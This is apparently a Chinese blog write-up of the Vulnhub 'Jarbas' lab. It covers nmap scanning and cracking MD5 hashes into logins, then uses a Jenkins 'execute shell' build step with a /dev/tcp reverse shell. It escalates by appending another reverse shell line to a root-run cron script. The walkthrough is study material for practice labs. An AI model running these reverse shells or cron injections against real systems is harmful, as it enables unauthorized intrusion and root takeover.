当前位置: 首页 > article >正文

【Vulnhub靶机】Jarbas--Jenkins

文章目录

    • 信息收集
      • 主机发现
      • 端口扫描
      • 目录爆破
    • 漏洞探测
      • whatweb
      • hash-identifier
      • whatweb

文档说明:https://www.vulnhub.com/entry/jarbas-1,232/

靶机下载:Download (Mirror):

信息收集

主机发现

扫描C段

sudo nmap -sn 10.9.75.0/24

image-20231125131716854

端口扫描

sudo nmap --min-rate 10000 10.9.75.10

image-20231125131847664

详细扫描服务版本,系统

sudo nmap -sT -sV -O -p 22,80,3306,8080 10.9.75.10 

image-20231125132007149

目录爆破

dirsearch -u http://10.9.75.10 -i 200  

image-20231125132323184

漏洞探测

whatweb

访问80端口

image-20231125132425330

whatweb http://10.9.75.10

image-20231125133245051

并没有识别到类似的CMS内容管理系统,

继续访问access.html发现了类似用户名:加密后的密码的东西

image-20231125132945210

hash-identifier

可以使用工具来验证加密类型

hash-identifier "5978a63b4654c73c60fa24f836386d87"  

image-20231125133052923

拿去在线网站进行md5解密

image-20231125133516690

image-20231125133605822

image-20231125133636880

tiago:italia99

trindade:marianna

eder:vipsu

访问8080端口

image-20231125134737788

whatweb

whatweb http://10.9.75.10:8080

image-20231125134830353

指纹识别出一个Jenkins的CMS管理系统

尝试使用上面解密出来的密码进行登陆

使用eder:vipsu登陆成功!

image-20231125135041152

image-20231125135104467

新建一个任务

image-20231125135842524

选择第一个自由风格软件项目就可以,然后往下翻,点击确定

点击Build构建

image-20231125135948173

由于目标系统是linux系统,所以选择第二个execute shell

/bin/bash >& /dev/tcp/10.9.75.3/6868 0>&1

#反弹到kali上

点击应用,然后点击保存

image-20231125140121483

这个时候kali先监听6868端口

nc  -lvvp 6868  

回到页面上点击立即构建

image-20231125140412821

就反弹到kali机器上了

image-20231125140529852

页面上会显示有一个任务正在运行

image-20231125140547563

我们拿到shell是没有回显的,可以通过python获取显示shell

python -c "import pty;pty.spawn('/bin/bash')"

image-20231125140911530

最后再计划任务里找到了以root运行 的程序

image-20231125141047389

查看文件内容

cat /etc/script/CleaningScript.sh

image-20231125141328159

可以在里面添加反弹shell,

echo "/bin/bash >& /dev/tcp/10.9.75.3/6869 0>&1" >> /etc/script/CleaningScript.sh

image-20231125141432284

kali监听6869端口,等待反弹

image-20231125141555084

Jenkins 的漏洞利用方式有很多,可以自行去网上查阅相关资料


http://www.kler.cn/a/146500.html

相关文章:

  • K8S集群常用命令
  • 基于 requests 依赖包的 Python 爬虫实战
  • 森林网络部署,工业4G路由器实现林区组网远程监控
  • 【Unity3D】【已解决】TextMeshPro无法显示中文的解决方法
  • 【算法篇】前缀和
  • W25Q64-FLASH
  • LLM之Agent(一):使用GPT-4开启AutoGPT Agent自动化任务完整指南
  • 【高效开发工具系列】PlantUML入门使用
  • 【PPT模板合集】关于自制内容的PPT模板合集,包括原创的PPT及改良内容的PPT,适合科研/比赛/工作
  • Linux python安装 虚拟环境 virtualenv,以及 git clone的 文件数据, 以及 下资源配置
  • 【数据结构】线段树
  • 数字技术-IPC专利分类号对应表
  • Spring Boot Admin(SBA)核心流程-注册篇
  • C#常见的设计模式-结构型模式
  • Doris-Routine Load(二十七)
  • 常用连接池的使用(jdbc)java 连接数据库
  • ubuntu下qtcreator打开大文件时内存占满并闪退的问题
  • Springboot引入分布式搜索引擎Es RestAPI
  • 如何使用cpolar+Jellyfin自建私人影音平台【内网穿透】
  • 【linux】服务器CPU占用50%,top/htop/ps却看不到异常进程?使用unhide可以查看!
  • Codeforces Round 786 (Div. 3) D. A-B-C Sort
  • 马养殖场建设VR模拟实训教学平台具有灵活性和复用性
  • 图论|知识图谱——详解自下而上构建知识图谱全过程
  • 智能电子会议桌牌
  • SWT技巧
  • C++ 红黑树插入详解